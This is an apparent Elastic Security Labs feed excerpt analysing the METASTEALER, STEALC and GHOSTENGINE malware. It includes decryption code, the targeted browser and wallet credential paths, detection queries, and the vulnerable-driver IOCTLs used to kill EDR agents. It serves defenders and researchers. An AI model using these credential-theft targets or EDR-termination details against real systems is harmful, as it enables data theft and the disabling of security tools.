<p>This METASTEALER sample utilizes the <a href="https://www.secureteam.net/">AGILE.NET</a> obfuscator, specifically its proxy call obfuscation method. This technique is used to conceal the direct invocation of an original function by introducing an additional layer of abstraction. Instead of directly invoking the function, AGILE.NET generates a proxy method that then invokes the original function. This added complexity makes it more challenging for code analysts to discern the sequence of actions.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image9.png" alt="METASTEALER's obfuscation" /></p>
<p>Looking at the code above, we can see the method <code>Delegate11.smethod_0</code> invokes <code>Delegate11.delegate11_0</code>, which is not initialized, introducing ambiguity during static analysis because analysts cannot determine which method will actually be executed.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image14.png" alt="METASTEALER initializing the delegate" /></p>
<p>At runtime, the malware initializes the delegate by calling the method <code>Class4.smethod_13</code> in the constructor of the <code>Delegate11</code> class. This method constructs a dictionary of token values, where each key represents the token value of a delegate (e.g., <code>0x040002DE</code>) and its corresponding value represents the token of the original method to be executed. This dictionary is constructed from a sequence of bytes stored in the binary, enabling dynamic resolution of method invocations at runtime.</p>
<p>Following this, it will generate a dynamic method for the delegate and execute it using the <code>smethod_0</code> function.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image8.png" alt="METASTEALER generating delegates dynamic method" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image7.png" alt="METASTEALER checking for debuggers" /></p>
<p>All the important strings in the configuration, like the C2 IP address and port, are encrypted. The malware has a class called <code>Strings</code> that is called at the start of execution to decrypt all the strings at once, a process involving a combination of Base64 encoding, XOR decryption, and AES CBC decryption.</p>
<p>Initially, the AES parameters, such as the <code>AES KEY</code> and <code>AES IV</code>, undergo decryption. In the provided example, the <code>AES KEY</code> and <code>AES IV</code> are first base64 decoded. Subsequently, they are subjected to XOR decryption using a predetermined XOR key, followed by two consecutive base64 decoding steps.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image1.png" alt="Encrypted AES parameters" /></p>
<p>The <code>Strings</code> class holds byte arrays that are decrypted using AES CBC after being reversed, and then appended to the <strong>Strings.Array</strong> list. Later, when the malware requires a specific string, it accesses it by indexing this list, for example <strong>Strings.get(6)</strong>.</p>
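<p>The parameter-recovery chain described above (base64 decode, XOR with the hardcoded key, then two further base64 decodes) can be sketched with the standard library alone; the final AES CBC decryption of the reversed byte arrays, which would require a crypto library, is omitted. Names and values here are hypothetical:</p>

```python
import base64
from itertools import cycle

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def recover_aes_param(blob: str, xor_key: bytes) -> bytes:
    """METASTEALER-style AES parameter recovery:
    base64 decode -> XOR with the hardcoded key -> base64 decode twice."""
    step = xor_bytes(base64.b64decode(blob), xor_key)
    return base64.b64decode(base64.b64decode(step))

def wrap_aes_param(param: bytes, xor_key: bytes) -> str:
    """Forward direction, used here only to demonstrate the round trip."""
    inner = base64.b64encode(base64.b64encode(param))
    return base64.b64encode(xor_bytes(inner, xor_key)).decode()
```

<p>In a real sample, the recovered <code>AES KEY</code> and <code>AES IV</code> would then feed the AES CBC decryption of each reversed byte array in the <code>Strings</code> class.</p>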
<h3>STEALC</h3>
<p>A recent major player in the stealer space, <a href="https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/">discovered</a> by Sekoia in February 2023, is the <a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc">STEALC</a> family. This malware was first advertised in an underground forum in January 2023, where the developer acknowledged a major dependency on existing families such as VIDAR, RACCOON, and REDLINE. Since then, our team has observed new STEALC samples daily, a sign of its popularity and adoption by cybercriminals.</p>
<p>STEALC is implemented in C and includes features like dynamic imports, string obfuscation, and various anti-analysis checks prior to activating its data-stealing capabilities. In order to protect the binary and its core features, STEALC encrypts its strings using a combination of Base64 + RC4 using a hardcoded key embedded in each sample.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image10.png" alt="Embedded RC4 key and encrypted strings within STEALC" /></p>
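<p>Decrypting a STEALC string is therefore a base64 decode followed by RC4 with the sample’s embedded key. A sketch using a textbook RC4 implementation (the key below is hypothetical; each real sample embeds its own):</p>

```python
import base64

def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); RC4 is symmetric, so this both encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                         # pseudo-random generation algorithm
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def decrypt_stealc_string(encoded: str, key: bytes) -> str:
    """STEALC-style string decryption: base64 decode, then RC4 with the embedded key."""
    return rc4(key, base64.b64decode(encoded)).decode()
```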
<p>There are six separate functions used for anti-analysis/anti-sandbox checks within STEALC. One check is based on the number of processors: STEALC will terminate itself if the active processor count is less than 2.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image2.png" alt="Retrieve number of processors" /></p>
<p>STEALC performs a sandbox/emulation test using a more obscure Windows API (<code>VirtualAllocExNuma</code>) to allocate a large amount of memory. If the API is not implemented, the process will terminate.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image15.png" alt="API check using VirtualAllocExNuma" /></p>
<p>The malware performs another sandbox check by calling <code>GlobalMemoryStatusEx</code>. After a byte shift against the collected physical memory attributes, the sample will terminate if the resulting value is less than <code>0x457</code>.</p>
<p>The malware will stop execution if the language identifier matches one of the following LangIDs:</p>
<ul>
<li>Russian_Russia  (<code>0x419</code>)</li>
<li>Ukrainian_Ukraine  (<code>0x422</code>)</li>
<li>Belarusian_Belarus (<code>0x423</code>)</li>
<li>Kazakh_Kazakhstan (<code>0x43f</code>)</li>
<li>Uzbek_Latin__Uzbekistan (<code>0x443</code>)</li>
</ul>
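<p>The check itself is trivial to reproduce. On a real system the malware obtains the value from a Windows API such as <code>GetUserDefaultLangID</code>; the helper below is ours and simply mirrors the comparison:</p>

```python
# CIS-region language identifiers STEALC refuses to run under.
EXCLUDED_LANGIDS = {
    0x419,  # Russian_Russia
    0x422,  # Ukrainian_Ukraine
    0x423,  # Belarusian_Belarus
    0x43F,  # Kazakh_Kazakhstan
    0x443,  # Uzbek_Latin_Uzbekistan
}

def should_terminate(langid: int) -> bool:
    """Return True if the sample would exit for this user-default LangID."""
    return langid in EXCLUDED_LANGIDS
```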
<p>STEALC also incorporates a Microsoft Defender emulation check, which we have observed in many stealers, such as <a href="https://www.elastic.co/es/security-labs/elastic-security-labs-discovers-lobshot-malware">LOBSHOT</a>. STEALC will terminate if it finds the hard-coded values used inside Microsoft Defender’s emulation layer: the username <code>JohnDoe</code> and the computer name <code>HAL9TH</code>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image12.png" alt="Microsoft Defender emulation check using computer name and username" /></p>
<p>One of the more impactful anti-analysis checks that comes with STEALC is an expiration date. This unique value gets placed into the malware’s config to ensure that the stealer won’t execute after a specific date set by the builder. This allows the malware to keep a lower profile by using shorter turnarounds in campaigns and limiting the execution in sandbox environments.</p>
<h4>STEALC - Execution flow</h4>
<p>After initial execution, STEALC sends the machine’s hardware ID and receives a configuration from the C2 server:</p>
<pre><code>f960cc969e79d7b100652712b439978f789705156b5a554db3acca13cb298050efa268fb|done|tested.file|1|1|1|1|1|1|1|1|
</code></pre>
<p>After this request, it sends multiple requests to receive an updated list of targeted browsers and browser extensions. Below is an example of the browser configuration, which contains the targeted directory paths where sensitive data is stored.</p>
<pre><code>Google Chrome|\Google\Chrome\User Data|chrome|chrome.exe|Google Chrome Canary|\Google\Chrome SxS\User Data|chrome|chrome.exe|Chromium|\Chromium\User Data|chrome|chrome.exe|Amigo|\Amigo\User Data|chrome|0|Torch|\Torch\User Data|chrome|0|Vivaldi|\Vivaldi\User Data|chrome|vivaldi.exe|Comodo Dragon|\Comodo\Dragon\User Data|chrome|0|EpicPrivacyBrowser|\Epic Privacy Browser\User Data|chrome|0|CocCoc|\CocCoc\Browser\User Data|chrome|0|Brave|\BraveSoftware\Brave-Browser\User Data|chrome|brave.exe|Cent Browser|\CentBrowser\User Data|chrome|0|7Star|\7Star\7Star\User Data|chrome|0|Chedot Browser|\Chedot\User Data|chrome|0|Microsoft Edge|\Microsoft\Edge\User Data|chrome|msedge.exe|360 Browser|\360Browser\Browser\User Data|chrome|0|QQBrowser|\Tencent\QQBrowser\User Data|chrome|0|CryptoTab|\CryptoTab Browser\User Data|chrome|browser.exe|Opera Stable|\Opera Software|opera|opera.exe|Opera GX Stable|\Opera Software|opera|opera.exe|Mozilla Firefox|\Mozilla\Firefox\Profiles|firefox|0|Pale Moon|\Moonchild Productions\Pale Moon\Profiles|firefox|0|Opera Crypto Stable|\Opera Software|opera|opera.exe|Thunderbird|\Thunderbird\Profiles|firefox|0|
</code></pre>
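<p>Judging from the example above, each browser record consists of four pipe-delimited fields: display name, profile data path, engine family, and process name (<code>0</code> when unset). A hypothetical parser for triaging captured configurations, based on that assumption:</p>

```python
def parse_browser_config(config: str) -> list[dict]:
    """Split a STEALC-style pipe-delimited browser configuration into records.
    Assumes four fields per record, as seen in the captured example:
    display name | profile path | engine family | process name ("0" if unset)."""
    fields = [f for f in config.split("|") if f != ""]
    records = []
    for i in range(0, len(fields) - len(fields) % 4, 4):
        name, path, engine, process = fields[i:i + 4]
        records.append({"name": name, "path": path,
                        "engine": engine, "process": process})
    return records
```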
<p>At this point, STEALC collects a broad range of victim information. This information is formatted, Base64 encoded, and sent to the C2 server over POST requests using form data fields.</p>
<ul>
<li>Hardware ID</li>
<li>Windows OS product info</li>
<li>Processor / RAM information</li>
<li>Username / computername</li>
<li>Local system time / time zone / locale of victim</li>
<li>Keyboard layout</li>
<li>Battery check (used to determine if laptop or not)</li>
<li>Desktop resolution, display info</li>
<li>Installed programs, running processes</li>
</ul>
<p>For the stealing component, STEALC leverages the received configurations in order to collect various valuable information including:</p>
<ul>
<li>Browser cookies</li>
<li>Login data</li>
<li>Web data</li>
<li>History</li>
<li>Cryptocurrency wallets</li>
</ul>
<p>STEALC also offers various other configuration options, including:</p>
<ul>
<li>Telegram data</li>
<li>Discord</li>
<li>Tox</li>
<li>Pidgin</li>
<li>Steam</li>
<li>Outlook emails</li>
</ul>
<table>
<thead>
<tr>
<th></th>
<th>REDLINE</th>
<th>METASTEALER</th>
<th>STEALC</th>
</tr>
</thead>
<tbody>
<tr>
<td>First time seen in the wild</td>
<td>2020</td>
<td>2022</td>
<td>2023</td>
</tr>
<tr>
<td>Source Language</td>
<td>C#</td>
<td>C#</td>
<td>C</td>
</tr>
<tr>
<td>Average size (unpacked)</td>
<td>253 KB</td>
<td>278 KB</td>
<td>107 KB</td>
</tr>
<tr>
<td>String obfuscation? Algo?</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes (custom RC4 + base64)</td>
</tr>
</tbody>
</table>
<h2>Detection</h2>
<p>To fully leverage the detection capabilities listed below for these threats with Elastic Security, it is essential to use the <a href="https://docs.elastic.co/en/integrations/endpoint">Elastic Defend</a> and <a href="https://docs.elastic.co/en/integrations/windows">Windows</a> integrations.</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_connection_to_webservice_by_an_unsigned_binary.toml">Connection to WebService by an Unsigned Binary</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_connection_to_webservice_by_a_signed_binary_proxy.toml">Connection to WebService by a Signed Binary Proxy</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/command_and_control_suspicious_dns_query_from_mounted_virtual_disk.toml">Suspicious DNS Query from Mounted Virtual Disk</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_suspicious_access_to_web_browser_credential_stores.toml">Suspicious Access to Web Browser Credential Stores</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_web_browser_credential_access_via_unsigned_process.toml">Web Browser Credential Access via Unsigned Process</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_access_to_browser_credentials_from_suspicious_memory.toml">Access to Browser Credentials from Suspicious Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_failed_access_attempt_to_web_browser_files.toml">Failed Access Attempt to Web Browser Files</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_web_browser_credential_access_via_unusual_process.toml">Web Browser Credential Access via Unusual Process</a></li>
</ul>
<h3>ES|QL queries</h3>
<p>The following list of hunt and detection queries can be used to detect stealer activity:</p>
<ul>
<li>
<p>Identifies untrusted or unsigned executables making DNS requests to Telegram or Discord domains, which may indicate command-and-control communication attempts.</p>
<pre><code class="language-sql">from logs-endpoint*
| where (process.code_signature.trusted == false or process.code_signature.exists == false)
| where dns.question.name in (&quot;api.telegram.org&quot;, &quot;cdn.discordapp.com&quot;,
                                &quot;discordapp.com&quot;, &quot;discord.com&quot;, &quot;discord.gg&quot;)
| stats executable_count = count(*) by process.executable, process.name, dns.question.name
| sort executable_count desc
</code></pre>
</li>
<li>
<p>Detects suspicious activity targeting crypto wallet files and configurations stored on Windows systems.</p>
<pre><code class="language-sql">from logs-endpoint.events.file-*
| where @timestamp &gt; now() - 14 days
| where host.os.type == &quot;windows&quot;
and event.category == &quot;file&quot;
and event.action == &quot;open&quot; 
and (
  file.path rlike &quot;&quot;&quot;C:\\Users\\.+\\AppData\\Roaming\\.+\\(Bitcoin|Ethereum|Electrum|Zcash|Monero|Wallet|Litecoin|Dogecoin|Coinbase|Exodus|Jaxx|MyEtherWallet|MetaMask)\\.*&quot;&quot;&quot;
  or file.path rlike &quot;&quot;&quot;C:\\ProgramData\\.+\\(Bitcoin|Ethereum|Electrum|Zcash|Monero|Wallet|Litecoin|Dogecoin|Coinbase|Exodus|Jaxx|MyEtherWallet|MetaMask)\\.*&quot;&quot;&quot;
)
| keep process.executable, process.name, host.id, file.path, file.name
| stats number_hosts = count_distinct(host.id), unique_files = count_distinct(file.name) by process.executable
| where number_hosts == 1 and unique_files &gt;= 3
| sort number_hosts desc
</code></pre>
</li>
<li>
<p>Monitors access to sensitive browser data, such as cookies, login data, and browsing history, which may indicate information-stealing malware activities.</p>
<pre><code class="language-sql">from logs-endpoint.events.file-*, logs-windows.sysmon_operational-default-*
| where @timestamp &gt; now() - 14 days
| where host.os.type == &quot;windows&quot;
and event.category == &quot;file&quot;
and event.action in (&quot;open&quot;, &quot;modification&quot;)
and (
  file.path rlike &quot;C:\\\\Users\\\\.+\\\\AppData\\\\Local\\\\(Google\\\\Chrome\\\\User Data\\\\.*|Google\\\\Chrome SxS\\\\User Data\\\\.*|Chromium\\\\User Data\\\\.*|Amigo\\\\User Data\\\\.*|Torch\\\\User Data\\\\.*|Vivaldi\\\\User Data\\\\.*|Comodo\\\\Dragon\\\\User Data\\\\.*|Epic Privacy Browser\\\\User Data\\\\.*|CocCoc\\\\Browser\\\\User Data\\\\.*|BraveSoftware\\\\Brave-Browser\\\\User Data\\\\.*|CentBrowser\\\\User Data\\\\.*|7Star\\\\7Star\\\\User Data\\\\.*|Chedot\\\\User Data\\\\.*|Microsoft\\\\Edge\\\\User Data\\\\.*|360Browser\\\\Browser\\\\User Data\\\\.*|Tencent\\\\QQBrowser\\\\User Data\\\\.*|CryptoTab Browser\\\\User Data\\\\.*|Opera Software\\\\Opera Stable\\\\.*|Opera Software\\\\Opera GX Stable\\\\.*)\\\\(Default|Profile \\\\d+)\\\\(Cookies|Login Data|Web Data|History|Bookmarks|Preferences|Visited Links|Network Action Predictor|Top Sites|Favicons|Shortcuts)&quot;
  or file.path rlike &quot;C:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\.*\\\\(cookies.sqlite|logins.json|places.sqlite|key4.db|cert9.db)&quot;
  or file.path rlike &quot;C:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\Moonchild Productions\\\\Pale Moon\\\\Profiles\\\\.*\\\\(cookies.sqlite|logins.json|places.sqlite|key3.db|cert8.db)&quot;
  or file.path rlike &quot;C:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\Thunderbird\\\\Profiles\\\\.*\\\\(cookies.sqlite|logins.json|key4.db|cert9.db)&quot;
)
| keep process.executable, process.name, event.action, host.id, host.name, file.path, file.name
| eval process_path = replace(process.executable, &quot;([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}|ns[a-z][A-Z0-9]{3,4}\\.tmp|DX[A-Z0-9]{3,4}\\.tmp|7z[A-Z0-9]{3,5}\\.tmp|[0-9\\.\\-_]{3,})&quot;, &quot;&quot;)
| eval process_path = replace(process_path, &quot;[cC]:\\\\[uU][sS][eE][rR][sS]\\\\[a-zA-Z0-9\\.\\-_\\$~ ]+\\\\&quot;, &quot;C:\\\\users\\\\user\\\\&quot;)
| eval normalized_file_path = replace(file.path, &quot;[cC]:\\\\[uU][sS][eE][rR][sS]\\\\[a-zA-Z0-9\\.\\-_\\$~ ]+\\\\&quot;, &quot;C:\\\\users\\\\user\\\\&quot;)
| stats number_hosts = count_distinct(host.id) by process.executable, process.name, event.action, normalized_file_path, file.name, host.name
| where number_hosts == 1
| sort number_hosts desc
</code></pre>
</li>
</ul>
<h3>YARA rules</h3>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_MetaStealer.yar">Windows Trojan MetaStealer</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Stealc.yar">Windows Trojan Stealc</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_RedLineStealer.yar">Windows Trojan RedLineStealer</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_AgentTesla.yar">Windows Trojan AgentTesla</a></li>
</ul>
<h2>Conclusion</h2>
<p>In conclusion, it's crucial to recognize that these malware threats pose significant risks to both companies and individuals alike. Their affordability makes them accessible not only to sophisticated cybercriminals but also to small-time offenders and script kiddies. This accessibility underscores the democratisation of cybercrime, where even individuals with limited technical expertise can deploy malicious software.</p>
<p>Elastic's comprehensive suite of security features, from advanced threat detection to real-time monitoring and response capabilities, offers organisations and individuals the tools they need to defend against malware attacks effectively.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/Security Labs Images 25.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Invisible miners: unveiling GHOSTENGINE’s crypto mining operations]]></title>
            <link>https://www.elastic.co/es/security-labs/invisible-miners-unveiling-ghostengine</link>
            <guid>invisible-miners-unveiling-ghostengine</guid>
            <pubDate>Wed, 22 May 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs has identified REF4578, an intrusion set incorporating several malicious modules and leveraging vulnerable drivers to disable known security solutions (EDRs) for crypto mining.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Elastic Security Labs has identified an intrusion set incorporating several malicious modules and leveraging vulnerable drivers to disable known security solutions (EDRs) for crypto mining. Additionally, the team discovered capabilities to establish persistence, install a previously undocumented backdoor, and execute a crypto-miner. We refer to this intrusion set as REF4578 and the primary payload as GHOSTENGINE (tangential research by the team at Antiy has named parts of this intrusion set <a href="https://www.antiy.com/response/HideShoveling.html">HIDDENSHOVEL</a>).</p>
<h2>Key takeaways</h2>
<ul>
<li>Malware authors incorporated many contingency and duplication mechanisms</li>
<li>GHOSTENGINE leverages vulnerable drivers to terminate and delete known EDR agents that would likely interfere with the deployed and well-known coin miner</li>
<li>This campaign involved an uncommon amount of complexity to ensure both the installation and persistence of the XMRIG miner</li>
</ul>
<h2>Code analysis</h2>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image4.png" alt="REF4578 execution flow" title="REF4578 execution flow" /></p>
<p>On May 6, 2024, at 14:08:33 UTC, the execution of a PE file named <code>Tiworker.exe</code> (masquerading as the legitimate Windows <code>TiWorker.exe</code> file) signified the beginning of the REF4578 intrusion. The following alerts were captured in telemetry, indicating a known vulnerable driver was deployed.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image8.png" alt="REF4578 executes Tiworker to start the infection chain" title="REF4578 executes Tiworker to start the infection chain" /></p>
<p>Upon execution, this file downloads and executes a PowerShell script that orchestrates the entire execution flow of the intrusion. Analysis revealed that this binary executes a hardcoded PowerShell command line to retrieve an obfuscated script, <code>get.png</code>, which is used to download further tools, modules, and configurations from the attacker C2, as depicted in the screenshot below.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image10.png" alt="Downloading get.png" title="Downloading get.png" /></p>
<h3>GHOSTENGINE</h3>
<p>GHOSTENGINE is responsible for retrieving and executing modules on the machine. It primarily uses HTTP to download files from a configured domain, with a backup IP in case domains are unavailable. Additionally, it employs FTP as a secondary protocol with embedded credentials. The following is a summary of the execution flow:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image11.png" alt="The get.png PowerShell script" title="The get.png PowerShell script" /></p>
<p>This script downloads and executes <code>clearn.png</code>, a component designed to purge the system of remnants from prior infections belonging to the same family but a different campaign; it removes malicious files under <code>C:\Program Files\Common Files\System\ado</code> and <code>C:\PROGRA~1\COMMON~1\System\ado\</code> and removes the following scheduled tasks by name:</p>
<ul>
<li><code>Microsoft Assist Job</code></li>
<li><code>System Help Center Job</code></li>
<li><code>SystemFlushDns</code></li>
<li><code>SystemFlashDnsSrv</code></li>
</ul>
<p>Evidence of those scheduled task artifacts may be indicators of a prior infection.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image12.png" alt="clearn.png removing any infections from previous campaigns" title="clearn.png removing any infections from previous campaigns" /></p>
<p>During execution, it attempts to disable Windows Defender and clean the following Windows event log channels:</p>
<ul>
<li><code>Application</code></li>
<li><code>Security</code></li>
<li><code>Setup</code></li>
<li><code>System</code></li>
<li><code>Forwarded Events</code></li>
<li><code>Microsoft-Windows-Diagnostics-Performance</code></li>
<li><code>Microsoft-Windows-AppModel-Runtime/Operational</code></li>
<li><code>Microsoft-Windows-Winlogon/Operational</code></li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image13.png" alt="get.png clearing Windows log channels" title="get.png clearing Windows log channels" /></p>
<p><code>get.png</code> disables Windows Defender, enables remote services, and clears the contents of:</p>
<ul>
<li><code>C:\Windows\Temp\</code></li>
<li><code>C:\Windows\Logs\</code></li>
<li><code>C:\$Recycle.Bin\</code></li>
<li><code>C:\windows\ZAM.krnl.trace</code></li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image6.png" alt="get.png disabling Windows Defender and enabling remote services" title="get.png disabling Windows Defender and enabling remote services" /></p>
<p><code>get.png</code> also verifies that the <code>C:\</code> volume has at least 10 MB of free space to download files, storing them in <code>C:\Windows\Fonts</code>. If not, it will try to delete large files from the system before looking for another suitable volume with sufficient space and creating a folder under <code>$RECYCLE.BIN\Fonts</code>.</p>
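<p>The free-space precondition described above is straightforward to mirror when reproducing the loader's logic in a lab. The following Python sketch is illustrative (the function name and threshold parameter are our own; only the 10 MB floor comes from the observed behavior):</p>
<pre><code class="language-python">import shutil

# 10 MB floor taken from the behavior of get.png described above.
MIN_FREE_BYTES = 10 * 1024 * 1024

def has_room(path=".", min_free=MIN_FREE_BYTES):
    """Return True when the volume holding `path` has at least
    `min_free` bytes available, mirroring the loader's precondition."""
    return shutil.disk_usage(path).free >= min_free
</code></pre>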
<p>To get the current DNS resolution for the C2 domain names, GHOSTENGINE uses a hardcoded list of DNS servers, <code>1.1.1.1</code> and <code>8.8.8.8</code>.</p>
<p>Next, to establish persistence, <code>get.png</code> creates the following scheduled tasks as <code>SYSTEM</code>:</p>
<ul>
<li><strong>OneDriveCloudSync</strong> using <code>msdtc</code> to run the malicious service DLL <code>C:\Windows\System32\oci.dll</code> every 20 minutes (described later)</li>
<li><strong>DefaultBrowserUpdate</strong> to run <code>C:\Users\Public\run.bat</code>, which downloads the <code>get.png</code> script and executes it every 60 minutes</li>
<li><strong>OneDriveCloudBackup</strong> to execute <code>C:\Windows\Fonts\smartsscreen.exe</code> every 40 minutes</li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image21.png" alt="Scheduled tasks for persistence" title="Scheduled tasks for persistence" /></p>
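<p>Because the scheduled task names above (and the prior-campaign names removed by <code>clearn.png</code>) are static strings, a quick triage helper can flag them in an exported task list. This Python sketch is illustrative; how you enumerate tasks (for example, <code>schtasks /query</code> output) is left to the analyst:</p>
<pre><code class="language-python"># Scheduled task names tied to this intrusion set: the three persistence
# tasks above plus the prior-campaign names removed by clearn.png.
SUSPECT_TASKS = {
    "OneDriveCloudSync", "DefaultBrowserUpdate", "OneDriveCloudBackup",
    "Microsoft Assist Job", "System Help Center Job",
    "SystemFlushDns", "SystemFlashDnsSrv",
}

def flag_tasks(task_names):
    """Return the task names matching known REF4578 indicators,
    compared case-insensitively."""
    lookup = {t.lower() for t in SUSPECT_TASKS}
    return sorted(t for t in task_names if t.lower() in lookup)
</code></pre>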
<p><code>get.png</code> terminates all <code>curl.exe</code> processes and any PowerShell process with <code>*get.png*</code> in its command line, excluding the current process. This is a way to terminate any concurrently running instance of the malware.</p>
<p>This script then downloads <code>config.txt</code>, a JSON file containing the hashes of the PE files it retrieves. This file is used to determine whether updated binaries need to be downloaded, by checking the hashes of files left over from any past infections.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image9.png" alt="config.txt file used to check for updated binaries" title="config.txt file used to check for updated binaries" /></p>
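<p>The update check described above amounts to comparing expected hashes against the hashes of files already on disk. A minimal Python sketch, assuming a flat name-to-SHA-256 JSON layout for <code>config.txt</code> (the real schema may differ):</p>
<pre><code class="language-python">import hashlib
import json

def sha256_of(data):
    """SHA-256 hex digest of a byte string."""
    return hashlib.sha256(data).hexdigest()

def files_needing_update(config_json, local_hashes):
    """Given a config.txt-style mapping of file name to expected SHA-256
    (an assumed flat layout) and the hashes of files already on disk,
    return the files that would be (re-)downloaded."""
    expected = json.loads(config_json)
    return [name for name, digest in expected.items()
            if local_hashes.get(name, "").lower() != digest.lower()]
</code></pre>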
<p>Finally, <code>get.png</code> downloads all of its modules and various PE files. Below is a table containing a description of each downloaded file:</p>
<table>
<thead>
<tr>
<th>Path</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>C:\Windows\System32\drivers\aswArPots.sys</code></td>
<td>Kernel driver</td>
<td>Vulnerable driver from Avast</td>
</tr>
<tr>
<td><code>C:\Windows\System32\drivers\IObitUnlockers.sys</code></td>
<td>Kernel driver</td>
<td>Vulnerable driver from IObit</td>
</tr>
<tr>
<td><code>C:\Windows\Fonts\curl.exe</code></td>
<td>PE executable</td>
<td>Used to download files via cURL</td>
</tr>
<tr>
<td><code>C:\Windows\Fonts\smartsscreen.exe</code></td>
<td>PE executable</td>
<td>Core payload (GHOSTENGINE), its main purpose is to deactivate security instrumentation, complete initial infection, and execute the miner.</td>
</tr>
<tr>
<td><code>C:\Windows\System32\oci.dll</code></td>
<td>Service DLL</td>
<td>Persistence/updates module</td>
</tr>
<tr>
<td><code>backup.png</code></td>
<td>PowerShell script</td>
<td>Backdoor module</td>
</tr>
<tr>
<td><code>kill.png</code></td>
<td>PowerShell script</td>
<td>Injects and executes a PE file responsible for killing security sensors</td>
</tr>
</tbody>
</table>
<h3>GHOSTENGINE modules</h3>
<p>GHOSTENGINE deploys several modules that can tamper with security tools, create a backdoor, and check for software updates.</p>
<h4>EDR agent controller and miner module: smartsscreen.exe</h4>
<p>This module primarily terminates any active EDR agent processes before downloading and installing a crypto-miner.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image20.png" alt="smartscreen.exe GHOSTENGINE module" title="smartscreen.exe GHOSTENGINE module" /></p>
<p>The malware scans and compares all the running processes with a hardcoded list of known EDR agents. If there are any matches, it first terminates the security agent by leveraging the Avast Anti-Rootkit Driver file <code>aswArPots.sys</code> with the IOCTL <code>0x7299C004</code> to terminate the process by PID.</p>
<p><code>smartsscreen.exe</code> is then used to delete the security agent binary with another vulnerable driver, <code>IObitUnlockers.sys</code> from IObit, with the IOCTL <code>0x222124</code>.</p>
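<p>The two control codes above can be unpacked with the standard Windows <code>CTL_CODE</code> bit layout, which is often useful when triaging driver abuse. A small Python helper (generic Windows field definitions, nothing sample-specific):</p>
<pre><code class="language-python">def decode_ioctl(code):
    """Unpack a Windows IOCTL using the standard CTL_CODE layout:
    DeviceType in bits 16-31, Access in bits 14-15, Function in
    bits 2-13, and Method in bits 0-1."""
    return {
        "device_type": code >> 16,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,  # 0 == METHOD_BUFFERED
    }
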